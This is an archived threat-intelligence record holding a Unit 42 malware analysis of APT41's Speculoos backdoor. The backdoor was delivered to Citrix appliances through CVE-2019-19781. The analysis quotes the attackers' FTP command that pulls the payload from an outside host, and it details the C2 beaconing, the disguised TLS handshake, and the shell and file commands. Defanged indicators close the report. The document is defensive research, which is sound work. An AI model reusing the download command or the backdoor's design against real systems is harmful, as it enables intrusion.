{ "id": "7d2c6700-4bd7-4b30-8333-4a478d97679b", "created_at": "2026-04-06T00:19:11.957979Z", "updated_at": "2026-04-10T13:11:42.6305Z", "deleted_at": null, "sha1_hash": "95f48ca2991eab6a83242c13de3780ea56007628", "title": "APT41 Using New Speculoos Backdoor to Target Organizations Globally", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 175503, "plain_text": "APT41 Using New Speculoos Backdoor to Target Organizations\r\nGlobally\r\nBy Bryan Lee, Robert Falcone, Jen Miller-Osborn\r\nPublished: 2020-04-14 · Archived: 2026-04-05 17:43:12 UTC\r\nExecutive Summary\r\nOn March 25, 2020, FireEye published a research blog regarding a global attack campaign operated by an\r\nespionage motivated adversary group known as APT41. This attack campaign was thought to have operated\r\nbetween January 20 and March 11, specifically targeting Citrix, Cisco, and Zoho network appliances via\r\nexploitation of recently disclosed vulnerabilities. Based on WildFire and AutoFocus data available to Unit 42, we\r\nwere able to obtain samples of the payload targeting Citrix appliances, which were executables compiled to run on\r\nFreeBSD. We also used this data to identify multiple victims in industries such as healthcare, higher education,\r\nmanufacturing, government and technology services in multiple regions around the world, such as North America,\r\nSouth America, and Europe.\r\nThis blog will be specific to the FreeBSD-based payload that we have named Speculoos. We identified a total of\r\nfive samples from our dataset, all of which were approximately the same file size, but contain minute differences\r\namongst the sample set. The subtle differences indicate that they likely originated from the same developer and\r\nwere either recompiled or patched. As described by FireEye, Speculoos was delivered by exploiting CVE-2019-\r\n19781, a vulnerability affecting the Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN\r\nWANOP appliances that allowed an adversary to remotely execute arbitrary commands. This vulnerability was\r\nfirst disclosed on December 17, 2019 via security bulletin CTX267679 which contained several mitigation\r\nrecommendations. By January 24, 2020, permanent patches for the affected appliances were issued. Based on the\r\nspread of industries and regions, in addition to the timing of the vulnerability disclosure, we believe this campaign\r\nmay have been more opportunistic in nature compared to the highly targeted attack campaigns that are often\r\nassociated with these types of adversaries. However, considering the exploitation of the vulnerability in\r\nconjunction with delivery of a backdoor specifically designed to execute on the associated FreeBSD operating\r\nsystem indicates the adversary was absolutely targeting the affected devices.\r\nPalo Alto Networks customers are protected from this threat. Our threat prevention platform with Wildfire\r\nidentifies this malware as malicious while simultaneously updating the ‘malware’ category within the PAN-DB\r\nURL filtering solution for malicious and/or compromised domains that have been identified. AutoFocus customers\r\ncan continue to track Speculoos activity by using the Speculoos tag.\r\nAttack Details\r\nIn this attack campaign, the adversaries exploited CVE-2019-19781 to direct the victim appliances to retrieve\r\nSpeculoos over FTP using the command /usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/\u003cfilename\u003e\r\nas reported by FireEye. Our data was consistent with this activity, with the first wave beginning on January 31,\r\nhttps://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/\r\nPage 1 of 7\n\n2020 evening UTC to February 1, 2020 afternoon UTC using the filename bsd. This wave affected multiple higher\r\neducation organizations in the United States, a healthcare organization in the United States, and a consulting firm\r\nin Ireland. A second wave began on February 24, 2020 morning UTC through February 24, 2020 after midnight\r\nUTC, this time using the filename un. This wave affected a higher education organization in Colombia, a\r\nmanufacturing organization in Austria, a higher education organization targeted in the first wave in the United\r\nStates, and a state government in the United States. While the data Unit 42 has access to is not exhaustive,\r\nexamining the spread of victims we do have data on appears to indicate that this attack campaign may have been\r\nmore of an opportunistic push by APT41 to gain footholds in a large number of organizations with minimal effort\r\nto expand their attack infrastructure.\r\nThe deployment of a tool to run specifically on FreeBSD is fairly novel. Malware targeting BSD-based systems\r\nare relatively rare, and considering the use of this tool in conjunction with a vulnerability affecting specific Citrix\r\nnetwork appliances, it is highly likely Speculoos was specifically crafted for this attack campaign by APT41.\r\nBinary Analysis\r\nThe Speculoos backdoor is an ELF executable compiled with GCC 4.2.1 to run on a FreeBSD system. This\r\npayload does not appear to natively be able to maintain persistence, so it is likely it requires the adversary to use a\r\nseparate component or additional step to maintain their foothold. Upon execution, the payload enters a loop that\r\ncalls a function to communicate with the following command and control (C2) domain over TCP/443:\r\nalibaba.zzux[.]com (resolving to 119.28.139[.]120)\r\nIf it is unable to communicate with the domain above, Speculoos will attempt to use a backup C2 at\r\n119.28.139[.]20, also over TCP/443. If it is able to connect to either C2 server, it will carry out a TLS handshake\r\nwith the server using the hardcoded buffer in the binary which is used as the first packet in the handshake. Before\r\nsending the hardcoded buffer to the C2 server, Speculoos modifies offset 11 with the current time and offset 15\r\nwith 28 pseudorandom bytes generated by iterating through the domain string, adding the current time and then\r\nusing XOR on each byte with 7 multiplied by the byte's offset as a key. Figure 1 shows the hardcoded buffer\r\nbefore Speculoos modifies and sends it to the C2 server.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n16 03 01 00 B5 01 00 00 B1 03 01 00 00 00 00 00 ................\r\n00 00 00 00 00 6A CE 14 27 3F 24 92 AB 0A A3 F7 .....j..'?$.....\r\nDB 21 1C D6 7F FD E3 A3 50 00 00 00 00 48 C0 0A .............H..\r\nC0 14 00 88 00 87 00 39 00 38 C0 0F C0 05 00 84 .......9.8......\r\n00 35 C0 07 C0 09 C0 11 C0 13 00 45 00 44 00 66 .5.........E.D.f\r\n00 33 00 32 C0 0C C0 0E C0 02 C0 04 00 96 00 41 .3.2...........A\r\n00 04 00 05 00 2F C0 08 C0 12 00 16 00 13 C0 0D ...../..........\r\nC0 03 FE FF 00 0A 02 01 00 00 3F 00 00 00 13 00 ..........?.....\r\nhttps://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/\r\nPage 2 of 7\n\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n11 00 00 0E 6C 6F 67 69 6E 2E 6C 69 76 65 2E 63 ....login.live.c\r\n6F 6D FF 01 00 01 00 00 0A 00 08 00 06 00 17 00 om..............\r\n18 00 19 00 0B 00 02 01 00 00 23 00 00 33 74 00 ..........#..3t.\r\n00 00 05 00 05 01 00 00 00 00  ..........\r\nFigure 1. Hardcoded buffer used as the TLS Client Hello packet sent to the C2 server\r\nFigure 1 suggests that this is a handshake packet for TLS 1.0, specifically the Client Hello. The most interesting\r\npart of this Client Hello packet is that it is requesting login.live[.]com as the Server Name Indication (SNI), which\r\nsuggests that the author may try to make the handshake look innocuous, as seen in Figure 1.\r\nhttps://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/\r\nPage 3 of 7\n\nFigure 2. Client Hello packet in the TLS handshake uses login.live.com as the Server Name\r\nIndication\r\nAfter successfully connecting to the C2 and completing the TLS handshake, Speculoos will perform an initial\r\nsystem enumeration to fingerprint the victim system then send the data back to the C2 server. The buffer used to\r\nstore the information will be 1048 bytes and will be structured as seen in Table 1 below.\r\nOffset Description Notes\r\n0 Identifier Hardcoded string “freebsd”\r\n64 Unknown Hardcoded “5”\r\n68 Username Uses ‘getuid’ to get user of process, then ‘getpwuid.pw_name’ to get the name\r\n132 MAC addresses Uses if_nameindex to iterate through interfaces\r\n152 OS version Results of ‘uname-v’\r\n216 Hostname Results of ‘uname-s’ or ‘hostname’\r\n280 Disk space Enumerates file systems at ‘/’ and ‘/private/var’\r\n904 Physical memory Sysctl hw.physmem\r\n908 User memory Sysctl hw.usermem\r\nhttps://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/\r\nPage 4 of 7\n\n912 Number of CPUs Sysctl hw.ncpu\r\n916 CPU speed Sysctl machdep.tsc_freq/1000000\r\n920 CPU model Sysctl hw.model\r\nTable 1. Structure used to transmit gathered system information to the C2\r\nThe data is sent over the TLS channel and two bytes of data are expected in response by Speculoos. After a\r\nsuccessful response, it will then send a single byte (0xa) to the C2 and enter a loop to begin receiving commands.\r\nThe commands in Table 2 are then made available for the adversary to execute on the victim system. The\r\ncommands available to Speculoos indicate that this tool is a fully functional backdoor which gives the adversary\r\nfull control over the victim system.\r\nCommand\r\nSub-command\r\nDescription\r\n0x1E Creates shell related sub-command handler\r\nw (0x77)\r\nCreates a remote shell by forking off a “/bin/sh” process and redirects\r\nstandard input, output and error to the TLS socket\r\nf (0x66) Creates disk related sub-command handler\r\nf (0x66) Remove File (unlink function)\r\nk (0x6B) Remove Directory (rm -rf \"\u003cpath\u003e\")\r\ne (0x65) Run specified file (execv)\r\ng (0x67) Download file\r\ni (0x69) Upload file\r\n0x14 Enumerate Processes (Name, PID, PPID, Threads)\r\n0x15 Kill process\r\n0x1 List Folder Contents\r\n! (0x21) Execute command using “sh -c”\r\nTable 2. Commands in Speculoos’s command handler\r\nThe two Speculoos samples we analyzed were functionally identical, with only eight bytes differing between the\r\ntwo. This eight byte change was caused by the author replacing the uname -s command with the hostname\r\ncommand when gathering system information. It is unclear why the command may have been changed, as they\r\nreturn different results. uname -s will return the kernel information which would be the string FreeBSD on a\r\nhttps://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/\r\nPage 5 of 7\n\nFreeBSD system, while hostname would return print the name of the host system. Figure 2 shows a binary\r\ncomparison between the two Speculoos samples we analyzed that shows the eight byte difference.\r\nFigure 3. Binary comparison between two Speculoos samples showing different commands used to\r\ngather the hostname of the system\r\nImpact Assessment\r\nVulnerabilities that allow for remote code execution by unauthorized users are nearly always a potentially high\r\nimpact security issue, especially if they affect systems that are public-facing. In this case, CVE-2019-19781\r\naffected multiple appliances that were may be public-facing, and had a highly motivated adversary actively\r\nexploiting the vulnerability to install a custom backdoor. Considering the types of appliances that were affected, it\r\nis critical that any organization that may be affected take mitigation actions immediately. Because all or a\r\nsignificant amount of network activity must traverse these compromised network appliances, adversaries can more\r\neasily monitor or modify an entire organization’s network activity instead of being relegated to a single or handful\r\nof devices.\r\nIn addition, because by default these appliances have access to a large number of organizational systems, lateral\r\nmovement becomes far less of a challenge. The adversaries may attempt to directly traverse into other hosts that\r\nmust traverse through the compromised appliances, or even be able to modify network traffic to perform\r\nadditional malicious actions, such as injecting/delivering malicious code, executing man-in-the-middle attacks, or\r\nredirecting users to adversary owned login pages to harvest credentials. Lastly, due to the nature of appliances,\r\ndetection of these attacks may be significantly more challenging, as generally they are black-box type solutions\r\nwhich are not often interacted with or inspected for anomalous activity, unless an issue arises.\r\nPalo Alto Networks customers may be protected by\r\nDeploying Threat ID 57625, 57570, and 57497\r\nWildFire properly classifies Speculoos as malicious\r\nC2 domain has been classified as malicious in DNS Security\r\nAutoFocus customers may learn more via the Speculoos tag\r\nIndicators of Compromise\r\nAnalyzed Speculoos SHA256\r\n99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28\r\nhttps://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/\r\nPage 6 of 7\n\n6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167\r\nAdditional Speculoos SHA256\r\n493574e9b1cc618b1a967ba9dabec474bb239777a3d81c11e49e7bb9c71c0c4e\r\n85297097f6dbe8a52974a43016425d4adaa61f3bdb5fcdd186bfda2255d56b3d\r\nc2a88cc3418b488d212b36172b089b0d329fa6e4a094583b757fdd3c5398efe1\r\nNetwork Indicators\r\n119.28.139[.]20\r\nalibaba.zzux[.]com\r\n119.28.139[.]120\r\n66.42.98[.]220\r\nexchange.longmusic[.]com\r\nSource: https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/\r\nhttps://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/" ], "report_names": [ "apt41-using-new-speculoos-backdoor-to-target-organizations-globally" ], "threat_actors": [ { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434751, "ts_updated_at": 1775826702, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/95f48ca2991eab6a83242c13de3780ea56007628.pdf", "text": "https://archive.orkl.eu/95f48ca2991eab6a83242c13de3780ea56007628.txt", "img": "https://archive.orkl.eu/95f48ca2991eab6a83242c13de3780ea56007628.jpg" } }